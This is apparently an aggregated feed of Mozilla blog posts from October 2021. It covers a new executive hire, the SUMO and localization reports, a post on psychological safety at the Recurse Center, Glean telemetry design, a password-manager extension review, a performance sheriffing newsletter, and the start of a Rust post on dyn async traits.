While Mozilla is no stranger to innovation, this role is a new and exciting one for us. Imo’s focus won’t only be on new products that complement the work already happening in each of our product organizations, but also on creating the right systems to nurture new ideas within Mozilla and with like-minded people and organizations outside the company. I’m convinced that our brightest future comes from a combination of the products we offer directly and our connection to a broad ecosystem of creators, founders, and entrepreneurs in the world who are also trying to build a better internet. 

“People deserve technology that not only makes their lives better and easier, but technology that they can trust,” said Udom. “Mozilla is one of the few companies already doing this work through its core products. I am thrilled to join the team to help Mozilla and others with the same mission build next generation products that bring people the best of modern technology while still keeping their best interests at the center.”

Previously, Imo was the Chief Strategy and Product Officer at Outmatch where he was responsible for ensuring the business and product strategy delivered value to customers, while never losing sight of its mission to match people with purpose. Prior to Outmatch, Imo co-founded and served as CEO of Wepow, a video interviewing solution that reduces interviewing time and improves hiring quality. Imo helped grow Wepow from a small side-project in 2010 to a successful enterprise platform supporting hundreds of global brands that was later acquired by Outmatch. 

Beyond Imo’s impressive experience and background, it was his passion for learning and commitment to impacting the world in a positive way that made it clear that he was the right person for this work. Imo will report directly to me and will also sit on the steering committee. 

I look forward to working closely with Imo as we write the next chapter of innovation at Mozilla.

The post Welcome Imo Udom, Mozilla’s new Senior Vice President, Innovation Ecosystems appeared first on The Mozilla Blog.

Support.Mozilla.OrgWhat’s up with SUMO – October 2021

Hey folks,

As we enter October, I hope you’re all pumped up to welcome the last quarter of the year and, basically, wrapping up projects that we have for the remainder of the year. With that spirit, let’s start by welcoming the following folks into our community.

Welcome on board!

  1. Welcome to the support forum crazy.cat, Losa, and Zipyio!
  2. Also, welcome to Ihor from Ukraine, Static_salt from the Netherlands, as well as Eduardo and hcasellato from Brazil. Thanks for your contribution to the KB localization!

Community news

  • If you’ve been hearing about Firefox Suggest and are confused about what exactly is that, please read this contributor forum thread to find out more and join our discussion about it.
  • Last month, we welcomed Firefox Focus into the Play Store Support program. We connected the app to Conversocial so now, Play Store Support contributors should be able to reply to Google Play Store reviews for Firefox Focus from the tool. We also prepared this guideline on how to reply to the reviews.
  • Learn more about Firefox 93 here.
  • Another warm welcome for our new content manager, Abby Parise! She made a quick appearance in our community call last month. So go ahead and watch the call if you haven’t!
  • Check out the following release notes from Kitsune during the previous period:

Community call

  • Watch the monthly community call if you haven’t. Learn more about what’s new in September!
  • Reminder: Don’t hesitate to join the call in person if you can. We try our best to provide a safe space for everyone to contribute. You’re more than welcome to lurk in the call if you don’t feel comfortable turning on your video or speaking up. If you feel shy to ask questions during the meeting, feel free to add your questions on the contributor forum in advance, or put them in our Matrix channel, so we can address them during the meeting.

Community stats

KB

KB pageviews (*)

* KB pageviews number is a total of KB pageviews for /en-US/ only
Month Page views Vs previous month
Sep 2021 8,244,817 -2.57%

Top 5 KB contributors in the last 90 days: 

  1. AliceWyman
  2. Michele Rodaro
  3. Pierre Mozinet
  4. K_alex
  5. Julie

KB Localization

Top 10 locale based on total page views

Locale Sep 2021 pageviews (*) Localization progress (per Sep, 14)(**)
de 8.13% 100%
zh-CN 7.56% 100%
fr 6.59% 88%
es 6.10% 39%
pt-BR 5.96% 60%
ja 3.85% 54%
ru 3.77% 100%
it 2.22% 100%
pl 2.09% 87%
zh-TW 1.91% 5%
* Locale pageviews is an overall pageviews from the given locale (KB and other pages)

** Localization progress is the percentage of localized article from all KB articles per locale

Top 5 localization contributors in the last 90 days: 

  1. Milupo
  2. Michele Rodaro
  3. Jim Spentzos
  4. Valery Ledovskoy
  5. Soucet

Forum Support

Forum stats

Month Total questions Answer rate within 72 hrs Solved rate within 72 hrs Forum helpfulness
Sep 2021 2274 85.31% 24.32% 65.89%

Top 5 forum contributors in the last 90 days: 

  1. FredMcD
  2. Cor-el
  3. Seburo
  4. Jscher2000
  5. Sfhowes

Social Support

Twitter stats

Channel Sep 2021
Total conv Conv interacted
@firefox 3318 785
@FirefoxSupport 290 240

Top 5 contributors in Q3 2021

  1. Christophe Villeneuve
  2. Felipe Koji
  3. Andrew Truong

Play Store Support

We don’t have enough data for the Play Store Support yet. However, you can check out the overall Respond Tool metrics here.

Product updates

Firefox desktop

  • FX Desktop 94 (Nov 2)
    • Monochromatic Themes (Personalize Fx by opting into a polished monochromatic theme from a limited set)
    • Avoid interruptions when closing Firefox
    • Fx Desktop addition to Windows App store
    • Video Playback testing on MacOS: (Decrease power consumption during full screen playback)

Firefox mobile

Major Release 2 Mobile (Nov 2)

Area Feature Android IOS Focus
Firefox Home Jump Back in (Open Tabs) X X
Recently saved/Reading List X
Recent bookmarks X X
Customize Pocket Articles X
Clutter Free Tabs Inactive Tabs X
Better Search History Highlights in Awesome bar X
Themes Settings Themes Settings X
  • Check out Android Beta which has most of major feature updates
    • More features to come in FX Android V95/IOS V40 and beyond.

Other products / Experiments

  • Mozilla VPN V2.6 (Oct 20)
    • Multi-Account Container: When used with Mozilla VPN on, MAC allows for even greater privacy by having separate Wireguard tunnels for each container.  This will allow users to have tabs exit in different nodes in the same instance of the browser.
  • Firefox Relay Premium – launch (Oct 27)
    • Unlimited aliases
    • Create your own Domain name

Shout-outs!

  • Thanks for Selim and Chris for helping me with Turkish and Polish keywords for Conversocial.
  • Thanks for Wxie for the help in recognizing other zh-cn locale contributors! Thanks for taking the lead. The team is lucky to have you as a locale leader!
  • Props to Julie for her video experiment in the KB and for sharing the stats to the rest of us. Thanks for bringing more colors to our Knowledge Base!
  • Thanks for Jefferson Scher for straightening the Firefox Suggest confusion on Reddit. That definitely help people to understand the feature better.

If you know anyone that we should feature here, please contact Kiki and we’ll make sure to   add them in our next edition.

Useful links:

William LachanceLearning about Psychological Safety at the Recurse Center

Last summer, I took a 6-week sabbatical from my job to attend a virtual “programmers retreat” at the Recurse Center. I thought I’d write up some notes on the experience, with a particular lens towards what makes an environment suited towards learning, innovation, and personal growth.

Some context: I’m currently working as a software engineer at Mozilla, building out our data pipeline and analysis tooling. I’ve been at my current position for more than 10 years (my “anniversary” actually passed while I was out). I started out as a senior engineer in 2011, and was promoted to staff engineer in 2016. In tech-land, this is a really long tenure at a company. I felt like it was time to take a break from my day-to-day, explore some new ideas and concepts, and hopefully expose myself to a broader group of people in my field.

My original thinking was that I would mostly be spending this time building out an interactive computation environment I’ve been working on called Irydium. And I did quite a bit of that. However, I think the main thing I took away from this experience was some insight on what makes a remote environment for knowledge work really “click”. In particular, what makes somewhere feel psychologically safe, and how this feeling allows us to innovate and do our best work.

While the Recurse Center obviously has different goals than an organization that builds and delivers consumer software, I do think there are some things that it does that could be applied to Mozilla (and, likely, many other tech workplaces).

What is the Recurse Center?

Most succinctly, the Recurse Center is a “writer’s retreat for programmers”. It tries to provide an environment conducive to learning and creativity, an opportunity to refine your craft and learn new things, both from the act of programming itself and from interactions with the other like-minded people attending. The Recurse Center admits a wide variety of people, from those who have only been through a coding bootcamp to those who have been in the industry many years, like myself. The main admission criteria, from what I gather, are curiosity and friendliness.

Once admitted, you do a “batch”— either a mini (1 week), half-batch (6 weeks), or a full batch (12 weeks). I did a half-batch.

How does it work (during a global pandemic)?

The Recurse experience used to be entirely in-person, in a space in New York City - if you wanted to go, you needed to move there at least temporarily. Obviously that’s out the window during a Global Pandemic, and all activities are currently happening online. This was actually pretty ideal for me at this point in my life, as it allowed me to participate entirely remotely from my home in Hamilton, Ontario, Canada (near Toronto).

There’s a few elements that make “Virtual RC” tick:

  • A virtual space (pictured below) where you can see other people in your cohort. This is particularly useful when you want to jump into a conference room.
  • A shared “calendar” where people can schedule events, either adhoc (e.g. a one off social event, discussing a paper) or on a regular basis (e.g. a reading group)
  • A zulip chat server (which is a bit like Slack) for adhoc conversation with people in your cohort and alumni. There are multiple channels, covering a broad spectrum of interests.

Why does it work?

So far, what I’ve described probably sounds a lot like any remote tech workplace during the pandemic… and it sort of is! In some ways, my schedule and life while at Recurse didn’t feel all that different from my normal day-to-day. Wake up in the morning, drink coffee, meditate, work for roughly 8 hours, done. Qualitatively, however, my experience at Recurse felt unusually productive, and I learned a lot more than I expected to: not just the core stuff related to Irydium, but also unexpected new concepts like CRDTs, product design, and even how visual studio code syntax highlighting works.

What made the difference? Certainly, not having the normal pressures of a workplace helps - but I think there’s more to it than that. The way RC is constructed reinforces a sense of psychological safety which I think is key to learning and growth.

What is psychological safety and why should I care?

Psychological safety is a bit of a hot topic these days and there’s a lot of discussion about in management circles. I think it comes down to a feeling that you can take risks and “put yourself out there” without fear that you’ll be ignored, attacked, or ridiculed.

Why is this important? I would argue, because knowledge work is about building understanding — going from a place of not understanding to understanding. If you’re working on anything at all innovative, there is always an element of the unknown. In my experience, there is virtually always a sense of discomfort and uncertainty that goes along with that. This goes double when you’re working around and with people that you don’t know terribly well (and who might have far more experience than you). Are they going to make fun of you for not knowing a basic concept or for expressing an idea that’s “so wrong I don’t even know where to begin”? Or, just as bad, will you not get any feedback on your work at all?

In reality, except in truly toxic environments, you’ll rarely encounter outright abusive behaviour. But the isolation of remote work can breed similar feelings of disquiet and discomfort over time. My sense, after a year of working “hardcore” remote in COVID times, is that our normal workplace rituals of meetings, “stand ups”, and discussions over Slack don’t provide enough space for a meaningful sense of psychological safety to develop. They’re good enough for measuring progress towards agreed-upon goals but a true sense of belonging depends on less tightly scripted interactions among peers.

How the Recurse environment creates psychological safety

But the environment I described above isn’t that different from a workplace, is it? Speaking from my own experience, my coworkers at Mozilla are all pretty nice people. There’s also many channels for informal discussion at Mozilla, and of course direct messaging is always available (via Slack or Matrix). And yet, I still feel there is a pretty large gap between the two experiences. So what makes the difference? I’d say there were three important aspects of Recurse that really helped here: social rules, gentle prompts, and a closed space.

Social rules

There’s been a lot of discussion about community participation guidelines and standards of behaviour in workplaces. In general, these types of policies target really egregious behaviour like harassment: this is a pretty low bar. They aren’t, in my experience, sufficient to actually create an environment that actually feels safe.

The Recurse Center goes over and above a basic code of conduct, with four simple social rules:

  • No well-actually’s: corrections that aren’t relevant to the point someone was trying to make (this is probably the rule we’re most heavily conditioned to break).
  • No feigned surprise: acting surprised when someone doesn’t know something.
  • No backseat driving: lobbing advice from across the room (or across the online chat) without really joining or engaging in a conversation.
  • No subtle -isms: subtle expressions of racism, sexism, ageism, homophobia, transphobia and other kinds of bias and prejudice.

These rules aren’t “commandments” and you’re not meant to feel shame for violating them. The important thing is that by being there, the rules create an environment conducive to learning and growth. You can be reasonably confident that you can bring up a question or discussion point (or respond to one) and it won’t lead to a bad outcome. For example, you can expect not to be made fun of for asking what a UNIX socket is (and if you are, you can tell the person doing so to stop). Rather than there being an unspoken rule that everyone should already know everything about what they are trying to do, there is a spoken rule that states it’s expected that they don’t.

Working on Irydium, there’s an infinite number of ways I can feel incompetent: this is a requirement when engaging with concepts that I still don’t feel completely comfortable with: parsers, compilers, WebAssembly… the list goes on. Knowing that I could talk about what I’m working on (or something I’m interested in) and that the responses I got would be constructive and directed to the project, not the person made all the difference.1

Gentle prompts

The thing I loved the most about Recurse were the gentle prompts to engage with other people, talk about your work, and get help. A few that I really enjoyed during my time there:

  • The “checkins” channel. People would post what’s going on with their time at RC, their challenges, their struggles. Often there would be little snippits about people’s lives in there, which built to a feeling of community.
  • Hack & Tell: A weekly event where a group of us would get together in a Zoom room, talk about working on or building something, then rejoin the chat an hour later to show off what we accomplished.
  • Coffee Chats: A “coffee chat” bot at RC would pair you with other people in your batch (or alumni) on a cadence of your choosing. I met so many great people this way!
  • Weekly Presentations: At the end of each week, people would sign up to share something that they were working on our learned.

… and I could go on. What’s important are not the specific activities, but their end effect of building connectedness, creating opportunities for serendipitous collaboration and interaction (more than one discussion group came out of someone’s checkin post on Zulip) and generally creating an environment well-suited to learning.

A (semi) closed space

One of the things that makes the gentle prompts above “work” is that you have some idea of who you’re going to be interacting with. Having some predictability about who’s going to see what you post and engage with you (that they were vetted by RC’s interview process and are committed to the above-mentioned social rules) gives you some confidence to be vulnerable and share things that you might be reluctant to otherwise.

Those who have known me for a while will probably see the above as being a bit of departure from what I normally preach: throughout my tenure at Mozilla, I’ve constantly pushed the people I’ve worked with to do more work in public. In the case of a product like Firefox, which touches so many people, I think open and transparent practices are absolutely essential to building trust, creating opportunity, and ensuring that our software reflects a diversity of views. I applied the same philosophy to Irydium’s development while I was at the Recurse Center: I set up a public Matrix channel to discuss the project, published all my work on GitHub, and was quite chatty about what I was working on, both in this blog and on Twitter.

The key, I think, is being deliberate about what approach you take when: there is a place for both public and private conversations about what we work on. I’m strongly in favour of open design documents, community calls, public bug trackers and open source in general. But I think it’s also pretty ok to have smaller spaces for learning, personal development, and question asking. I know I strongly appreciated having a smaller group of people that I could talk to about ideas that were not yet fully formed: you can always bring them out into the open later. The psychological risk of working in public can be mitigated by the psychological safety that can be developed within an intentional community.

Bringing it back

Returning to my job, I wondered if it might be possible to bring some of what I described above back to Mozilla? Obviously not everything would be directly transferable: Mozilla has its own mission and goals, and there are pressures that exist in a workplace that do not exist in an environment purely directed at learning. Still, I suspected that there was something we could do here. And that it would be worth doing, not just to improve the felt experience of the people here (though that would be reason enough) but also to get more feedback on our work and create more opportunities for collaboration and innovation.

I felt like trying to do something inside our particular organization (Data Engineering and Data Science) would be the most tractable initial step. I talked a bit about my experience with Will Kahn-Green (who has been at Mozilla around the same length of time as I have) and we came up with what we called the “Data Neighbourhood” project: a set of grassroots micro-initiatives to increase our connectedness as a group. As an organization directed primarily at serving other parts of Mozilla, most of our team’s communication is directed outward. It’s often hard to know what everyone else is up to, where they’re struggling, and how we could help each other out. Attacking that problem directly seemed like the best place to start.

The first experiment we tried was a “data checkins” channel on Slack, a place for people to talk informally about their work (or life!). I explicitly set it up with a similar set of social rules as outlined above and tried to emphasize that it was a place to talk about how things are going, rather than a place to report status to your manager. After a somewhat slow start (the initial posts were from Will, myself, and a few other people from Data Engineering who had been around for a long time) we’re beginning to see engagement from others, including some newer people I hadn’t interacted with much before. There’s also been a few useful threads of conversations across different sub-teams (for example, a discussion on how we identify distinct versions of Firefox for iOS) that likely would not have happened without the channel.

Since then, others have tried a few other things in the same vein (an adhoc coffee chat pairing bot, a “writing help” channel) and there are some signs of success. There’s clearly an appetite for new and better ways for us to relate to each other about the work we’re doing, and I’m excited to see how these ideas evolve over time.

I suspect there are limits to how psychologically safe a workplace can ever feel (and some of that is probably outside of any individual’s control). There are dynamics in a workplace which make applying some of Recurse’s practices difficult. In particular, a posture of “not knowing things is o.k.” may not apply perfectly to a workplace where people are hired (and promoted) based on perceived competence and expertise. Still, I think it’s worth investigating what might be possible within the constraints of the system we’re in. There are big potential benefits, for our creative output and our well-being.

Many thanks to Jenny Zhang, Kathleen Beckett, Joe Trellick, Taylor Phebillo and Vaibhav Sagar, and Will Kahn-Greene for reviewing earlier drafts of this post

  1. This is generally considered best practice inside workplaces as well. For example, see Google’s guide on how to write code review comments

Data@MozillaThis Week in Glean: Designing a telemetry collection with Glean

Designing a telemetry collection with Glean

(“This Week in Glean” is a series of blog posts that the Glean Team at Mozilla is using to try to communicate better about our work. They could be release notes, documentation, hopes, dreams, or whatever: so long as it is inspired by Glean.) All “This Week in Glean” blog posts are listed in the TWiG index).

Whenever I get a chance to write about Glean, I am usually writing about some aspects of working on Glean. This time around I’m going to turn that on its head by sharing my experience working with Glean as a consumer with metrics to collect, specifically in regards to designing a Nimbus health metrics collection. This post is about sharing what I learned from the experience and what I found to be the most important considerations when designing a telemetry collection.

I’ve been helping develop Nimbus, Mozilla’s new experimentation platform, for a while now. It is one of many cross-platform tools written in Rust and it exists as part of the Mozilla Application Services collection of components. With Nimbus being used in more and more products we have a need to monitor its “health”, or how well it is performing in the wild. I took on this task of determining what we would need to measure and designing the telemetry and visualizations because I was interested in experiencing Glean from a consumer’s perspective.

So how exactly do you define the “health” of a software component? When I first sat down to work on this project, I had some vague idea of what this meant for Nimbus, but it really crystallized once I started looking at the types of measurements enabled by Glean. Glean offers different metric types designed to measure anything from a text value, multiple ways to count things, and even events to see how things occur in the flow of the application. For Nimbus, I knew that we would want to track errors, as well as a handful of numeric measurements like how much memory we used and how long it takes to perform certain critical tasks.

As a starting point, I began thinking about how to record errors, which seemed fairly straightforward. The first thing I had to consider was exactly what it was we were measuring (the “shape” of the data), and what questions we wanted to be able to answer with it. Since we have a good understanding about the context in which each of the errors can occur, we really only wanted to monitor the counts of errors to know if they increase or decrease. So, counting things, that’s one of the things Glean is really good at! So my choice in which metric type to use came down to flexibility and organization. Since there are 20+ different errors that are interesting to Nimbus, we could have used a separate counter metric for each of them, but this starts to get a little burdensome when declaring them in the metrics.yaml file. That would require a separate entry in the file for each. The other problem with using a separate counter for each error comes in adding just a bit of complexity to writing SQL for analysis or a dashboard. A query for analyzing the errors if the metrics are defined separately would require each error metric to be in the select statement, and any new errors that are added would also require the query to be modified to add them.

Instead of distinct counters for each error, I chose to model recording Nimbus errors after how Glean records its own internal errors, by using a LabeledCounterMetric. This means that all errors are collected under the same metric name, but have an additional property that is a “label”. Labels are like sub-categories within that one metric. That makes it a little easier to instrument, first in keeping clutter down in the metrics.yaml file, and maybe making it a little easier to create useful dashboards for monitoring error rates. We want to end up with a chart of errors that lets us see if we start to see an unusual spike or change in the trends, something like this:

A line graph showing multiple colored lines and their changes over time

We expect some small amount of errors, these are computers after all, but we can easily establish a baseline for each type of error, which allows us to configure some alerts if things are too far outside expectations.

The next set of things I wanted to know about Nimbus were in the area of performance. We want to detect regressions or problems with our implementation that might not show up locally for a developer in a debug build, so we measure these things at scale to see what performance looks like for everyone using Nimbus. Once again, I needed to think about what exactly we wanted to measure, and what sort of questions we wanted to be able to answer with the data. Since the performance data we were interested in was a measurement of time or memory, we wanted to be able to measure samples from a client periodically and then look at how different measurements are distributed across the population. We also needed to consider exactly when and where we wanted to measure these things. For instance, was it more important or more accurate to measure the database size as we were initializing, or deinitializing? Finally, I knew we would be interested in how that distribution changes over time so having some way to represent this by date or by version when we analyzed the data.

Glean gives us some great metric types to measure samples of things like time and size such as TimingDistributionMetrics and MemoryDistributionMetrics. Both of these metric types allow us to specify a resolution that we care about so that they can “bucket” up the samples into meaningfully sized chunks to create a sparse payload of data to keep things lean. These metric types also provide a “sum” so we can calculate an average from all the samples collected. When we sum these samples across the population, we end up with a histogram like the following, where measurements collected are on the x-axis, and the counts or occurrences of those measurements on the y-axis:

A histogram showing bell curve shaped data

This is a little limited because we can only look at the point in time of the data as a single dimension, whether that’s aggregated by time such as per day/week/year or aggregated on something else like the version of the Nimbus SDK or application. We can’t really see the change over time or version to see if something we added really impacted our performance. Ideally, we wanted to see how Nimbus performed compared to other versions or other weeks. When I asked around for good representations to show something like this, it was suggested that something like a ridgeline chart would be a great visualization for this sort of data:

A ridgeline chart, represented as a series of histograms arranged to form visualization that looks like a mountain ridge

Ridgeline charts give us a great idea of how the distribution changes, but unfortunately I ran into a little setback when I found out that the tools we use don’t currently have a view like that, so I may be stuck in a bit of a compromise until it does. Here is another visualization example, this time with the data stacked on top of each other:

A series of histograms stacked on top of each other

Even though something like this is much harder to read than the ridgeline, we still can see some change from one version to the next, just picking out the sequence becomes much harder. So I’m still left with a little bit of an issue with representing the performance data the way that we wanted. I think it’s at least something that can be iterated on to be more usable in the future, perhaps using something similar to GLAM’s visualization of percentiles of a histogram.

To conclude, I really learned the value of planning and thinking about telemetry design before instrumenting anything. The most important things to consider when designing a collection is what are you measuring, and what questions will you need to answer with the data. Both of those questions can affect not only which metric type you choose to represent your data, but where you want to measure something. Thinking about what questions you want to answer ahead of time allows you to be able to make sure that you are measuring the right things to be able to answer those questions. Planning before instrumenting can also help you to choose the right visualizations to make answering those questions easier, as well as being able to add things like alerts for when things aren’t quite right. So, take a little time to think about your telemetry collection ahead of instrumenting metrics, and don’t forget to validate the metrics once they are instrumented to ensure that they are, in fact, measuring what you think and expect. Plan ahead and I promise you, your data scientists will thank you.

Firefox Add-on ReviewsHow to choose the right password manager browser extension

All good password managers should, of course, effectively secure passwords; and they all basically do the same thing—you create a single, easy-to-remember master password to access your labyrinth of complex logins. Password managers not only spare you the hassle of remembering a maze of logins; they can also offer suggestions to help make your passwords even stronger. Fortunately there’s no shortage of capable password protectors out there. But with so many options, how to choose the one that’ll work best for you?  

Here are some of our favorite password managers. They all offer excellent password protection, but with distinct areas of strength.

What are the best FREE password manager extensions? 

Bitwarden

With the ability to create unlimited passwords across as many devices as you like, Bitwarden – Free Password Manager is one of the best budget-minded choices. 

Fortunately you don’t have to sacrifice strong security just because Bitwarden is free. The extension provides advanced end-to-end 256-bit AES encryption for extraordinary protection. 

Paid tiers include Team and Business plans that offer additional benefits like priority tech support, self-hosting capabilities, and more.

Roboform Password Manager

Also utilizing end-to-end 256-bit AES encryption, Roboform has a limited but potent feature set. 

A very intuitive interface makes it easy to manage compelling features like… 

  • Sync with 2FA apps (e.g. Google Authenticator)
  • Sync your Roboform data across multiple devices
  • Single-click logins
  • Automatically save new passwords 
  • Handles multi-step logins
  • Strong password generator
  • 7 form-filling templates for common cases (Person, Business, Passport, Address, Credit Card, Bank Account, Car, Custom)
<figcaption>Roboform makes it easy to manage your most sensitive data like banking information. </figcaption>

LastPass Password Manager

If you’re searching for an all-around solid password manager on desktop, Lastpass is a worthy consideration. Its free tier supports only one device, but you get a robust feature set if you’re okay with a single device limitation (price tiers available for multiple device and user plans).

Key features include…

  • Simple, intuitive interface
  • Security Dashboard suggests password improvements and performs Dark Web monitoring to see if any of your vital information has leaked 
  • Multi-factor authentication
  • Save all types of auto-fill forms like credit cards, addresses, banking information, etc.

What are the most professional grade password managers?

1Password

The most full featured password manager available, 1Password is not only a password manager but a dynamic digital vault system that secures private notes, financial information, auto-fill forms, and more. With a slick, intuitive interface, the extension makes managing your sensitive information a breeze. 

The “catch” is that 1Password has no free tier (just a free trial period). But the cost of 1Password may be worth it for folks who want effective password management (end-to-end 256-bit AES encryption) plus a bevy of other great features like…

  • Vaults help you keep your various protected areas (e.g. passwords, financial info, addresses, etc.) segregated so if your 1Password account is set for family or business, it’s easy to grant specific Vault access to certain members. 
  • Watchtower is a collection of security services that alert you to emerging 1Password threats, potentially compromised logins, and more
  • Travel mode is great for international travellers; when Vaults are in Travel mode they’ll automatically become inaccessible when you cross over potentially insecure borders 
  • App support across Mac, iOS, Windows, Android, Linux, and Chrome OS
  • Two-factor authentication for additional protection

From individual to family, team, and full-scale enterprise plans, you can see if 1Password’s pricing tiers are worth it for you. 

MYKI Password Manager & Authenticator

With a unique, decentralized approach to data storage plus other distinct features, MYKI stands apart in many interesting ways from its password manager peers. Do note, however, that MYKI is optimized to work best with a mobile device, should that be a consideration. 

Beautifully designed and easy to use, MYKI handles all the standard stuff you’d expect—it creates and stores strong passwords and has various auto-fill functions. Where MYKI earns distinction is through two key features: 

  1. Local data storage. Your passwords and other personal info only exist on your devices—not some remote cloud service. Reasonable minds may differ on the security benefits of cloud versus local storage, but if you’re concerned about your information existing on a cloud service that could be compromised, you might consider keeping all this critical data within your localized system
  2. Mobile device optimization. While you don’t need a mobile device to use MYKI as a basic password manager, the extension is certainly augmented by a mobile companion; with an integrated iOS or Android device you can… 
    1. Enable two-factor authentication (2FA) for added security
    2. Enable biometric authentication (e.g. iOS Touch ID, Windows Hello, etc.) and avoid a master password

These are some of our favorite browser based password managers. Feel free to explore more password managers on addons.mozilla.org

From individual to family, team, and full-scale enterprise plans, you can see if 1Password’s pricing tiers are worth it for you. 

Mozilla Performance BlogPerformance Sheriff Newsletter (September 2021)

In September there were 174 alerts generated, resulting in 23 regression bugs being filed on average 6.4 days after the regressing change landed.

Welcome to the September 2021 edition of the performance sheriffing newsletter. Here you’ll find the usual summary of our sheriffing efficiency metrics. If you’re interested (and if you have access) you can view the full dashboard.

Sheriffing efficiency

  • All alerts were triaged in an average of 2 days
  • 80% of alerts were triaged within 3 days
  • Valid regressions were associated with bugs in an average of 3.5 days
  • 74% of valid regressions were associated with bugs within 5 days

Sheriffing Efficiency (September 2021)

 

Summary of alerts

Each month we’ll highlight the regressions and improvements found.

Note that whilst we usually allow one week to pass before generating the report, there are still alerts under investigation for the period covered in this article. This means that whilst we believe these metrics to be accurate at the time of writing, some of them may change over time.

We would love to hear your feedback on this article, the queries, the dashboard, or anything else related to performance sheriffing or performance testing. You can comment here, or find the team on Matrix in #perftest or #perfsheriffs.

The dashboard for September can be found here (for those with access).

Mozilla Localization (L10N)L10n Report: October Edition

October 2021 Report

Please note some of the information provided in this report may be subject to change as we are sometimes sharing information about projects that are still in early stages and are not final yet. 

Welcome!

New l10n-driver

Welcome eemeli, our new l10n-driver! He will be working on Fluent and Pontoon, and is part of our tech team along with Matjaž. We hope we can all connect soon so you can meet him.

New localizers

Katelem from Obolo locale. Welcome to localization at Mozilla!

Are you a locale leader and want us to include new members in our upcoming reports? Contact us!

New community/locales added

Obolo (ann) locale was added to Pontoon.

New content and projects

What’s new or coming up in Firefox desktop

A new major release (MR2) is coming for Firefox desktop with Firefox 94. The deadline to translate content for this version, currently in Beta, is October 24.

While MR2 is not as content heavy as MR1, there are changes to very visible parts of the UI, like the onboarding for both new and existing users. Make sure to check out the latest edition of the Firefox L10n Newsletter for more details, and instructions on how to test.

What’s new or coming up in mobile

Focus for Android and iOS have gone through a new refresh! This was done as part of our ongoing MR2 work – which has also covered Firefox for Android and iOS. You can read about all of this here.

Many of you have been heavily involved in this work, and we thank you for making this MR2 launch across all mobile products such a successful release globally.

We are now starting our next iteration of MR2 releases. We are still currently working on scoping out the mobile work for l10n, so stay tuned.

One thing to note is that the l10n schedule dates for mobile should now be aligned across product operating systems: one l10n release cycle for all of android, and another release cycle for all of iOS. As always, Pontoon deadlines remain your source of truth for this.

What’s new or coming up in web projects
Firefox Accounts

Firefox Accounts team has been working on transitioning Gettext to Fluent. They are in the middle of migrating server.po to auth.ftl, the component that handles the email feature. Unlike previous migrations where the localized strings were not part of the plan, this time, the team wanted to include them as much as possible. The initial attempt didn’t go as planned due to multiple technical issues. The new auth.ftl file made a brief appearance in Pontoon and is now disabled. They will give it a go after confirming that the identified issues were addressed and tested.

Legal docs

All the legal docs are translated by our vendor. Some of you have reported translation errors or they are out of sync with the English source. If you spot any issues, wrong terminology, typo, missing content, to name a few, you can file a bug. Generally we do not encourage localizers to provide translations because of the nature of the content. If they are minor changes, you can create a PR and ask for a peer review to confirm your change before the change can be merged. If the overall quality is bad, we will request the vendor to change the translators.

Please note, the locale support for legal docs varies from product to product. Starting this year, the number of supported locales also has decreased to under 20. Some of the previously localized docs are no longer updated. This might be the reason you see your language out of sync with the English source.

Mozilla.org

Five more mobile specific pages were added since our last report. If you need to prioritize them, please give higher priority to the Focus, Index and Compare pages.

What’s new or coming up in SuMo

Lots of new stuff since our last update here in June. Here are some of the highlights:

  • We’re working on refreshing the onboarding experience in SUMO. The content preparation has mostly done in Q3 and the implementation is expected in this quarter before the end of the year.
  • Catch up on what’s new in our support platform by reading our release notes in Discourse. One highlight of the past quarter is that we integrated Zendesk form for Mozilla VPN into SUMO. We don’t have the capability to detect subscriber at the moment, so everyone can file a ticket now. But we’re hoping to add the capability for that in the future.
  • Firefox Focus joined our forces in Play Store support. Contributors should be able to reply to Google Play Store reviews for Firefox Focus from Conversocial now. We also create this guideline to help contributors compose a reply for Firefox Focus reviews.
  • We welcomed 2 new team members in Q3. Joe who is our Support Operation Manager is now taking care of the premium customer support experience. And Abby, the new Content Manager, is our team’s latest addition who will be working closely with Fabi and our KB contributors to improve our help content.

You’re always welcome to join our Matrix or the contributor forum to talk more about anything related to support!

What’s new or coming up in Pontoon

Submit your ideas and report bugs via GitHub

We have enabled GitHub Issues in the Pontoon repository and made it the new place for tracking bugs, enhancements and tasks for Pontoon development. At the same time, we have disabled the Pontoon Component in Bugzilla, and imported all open bugs into GitHub Issues. Old bugs are still accessible on their existing URLs. For reporting security vulnerabilities, we’ll use a newly created component in Bugzilla, which allows us to hide security problems from the public until they are resolved.

Using GitHub Issues will make it easier for the development team to resolve bugs via commit messages and put them on a Roadmap, which will also be moved to GitHub soon. We also hope GitHub Issues will make suggesting ideas and reporting issues easier for the users. Let us know if you run into any issues or have any questions!

More improvements to the notification system coming

As part of our H1 effort to better understand how notifications are being used, the following features have received most votes in a localizer survey:

  • Notifications for new strings should link to the group of strings added.
  • For translators and locale managers, get notifications when there are pending suggestions to review.
  • Add the ability to opt-out of specific notifications.

Thanks to eemeli, the first item was resolved back in August. The second feature has also been implemented, which means reviewers will receive weekly notifications about newly created unreviewed suggestions within the last week. Work on the last item – ability to opt-out of specific notification types – has started.

Newly published localizer facing documentation

We published two new posts in the Localization category on Discourse:

Events

  • Michal Stanke shared his experience as a volunteer in the open source community at the annual International Translation Day event hosted by WordPress! Way to go!
  • Want to showcase an event coming up that your community is participating in? Reach out to any l10n-driver and we’ll include that (see links to emails at the bottom of this report)

Useful Links

Questions? Want to get involved?

  • If you want to get involved, or have any question about l10n, reach out to:

Did you enjoy reading this report? Let us know how we can improve by reaching out to any one of the l10n-drivers listed above.

Niko MatsakisDyn async traits, part 6

A quick update to my last post: first, a better way to do what I was trying to do, and second, a sketch of the crate I’d like to see for experimental purposes.

An easier way to roll our own boxed dyn traits

In the previous post I covered how you could create vtables and pair the up with a data pointer to kind of “roll your own dyn”. After I published the post, though, dtolnay sent me this Rust playground link to show me a much better approach, one based on the erased-serde crate. The idea is that instead of make a “vtable struct” with a bunch of fn pointers, we create a “shadow trait” that reflects the contents of that vtable:

// erased trait:
trait ErasedAsyncIter {
    type Item;
    fn next<'me>(&'me mut self) -> Pin<Box<dyn Future<Output = Option<Self::Item>> + 'me>>;
}

Then the DynAsyncIter struct can just be a boxed form of this trait:

pub struct DynAsyncIter<'data, Item> {
    pointer: Box<dyn ErasedAsyncIter<Item = Item> + 'data>,
}

We define the “shim functions” by implementing ErasedAsyncIter for all T: AsyncIter:

impl<T> ErasedAsyncIter for T
where
    T: AsyncIter,
{
    type Item = T::Item;
